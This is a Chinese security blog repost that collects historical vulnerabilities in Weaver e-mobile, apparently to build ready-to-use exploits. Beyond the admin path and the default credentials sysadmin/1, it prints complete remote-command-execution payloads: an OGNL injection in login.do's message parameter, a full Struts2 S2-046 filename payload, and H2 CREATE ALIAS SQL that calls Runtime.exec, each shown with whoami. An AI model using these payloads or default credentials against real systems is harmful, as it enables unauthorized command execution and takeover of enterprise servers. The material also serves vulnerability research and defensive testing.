泛微 e-mobile 相关漏洞

admin 2022年3月17日03:29:27评论3,934 views3字数 1798阅读5分59秒阅读模式

0x01 前言

最近在开始写一些高可用的exploit, 顺便分析复现一些 "重要" 应用的历史漏洞, 归纳漏洞点特征, 攒攒审计思路, 毕竟"打点的尽头是挖洞"嘛.


0x02 后台 & 默认账号密码

  • 后台地址

/manager/login.do
  • 默认账号密码e-mobile常搭配e-cology使用、系统管理员即为e-cology的默认管理员

sysadmin/1

0x03 CNVD-2017-03561 OGNL表达式注入

已测试版本

v6.5v5.5

漏洞触发点

  • /login.do?message=${}

  • /manager/login.do?message=${}

回显

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

测试效果

泛微 e-mobile 相关漏洞


ps: 发现个新的触发点  或许可以用来绕过WAF


0x04 CNVD-2017-07285 S2-046 (S2系列)

已测试版本

v5

S2系列漏洞

泛微 e-mobile 相关漏洞

回显

filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

测试效果(S2-046)

泛微 e-mobile 相关漏洞


0x05 CNVD-2021-25287 SQLi to RCE

已测试版本

v6.6

内置H2数据库,可以利用alias别名,调用java代码达到命令执行的效果

CREATE ALIAS EXEC AS$$ void e(String cmd) throws java.io.IOException{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$CALL EXEC('whoami');

测试效果

  • messageType.do

泛微 e-mobile 相关漏洞

  • client.do

泛微 e-mobile 相关漏洞


参考资料

https://forum.butian.net/share/84


原文始发于微信公众号(pen4uin):泛微 e-mobile 相关漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月17日03:29:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 e-mobile 相关漏洞https://cn-sec.com/archives/826906.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息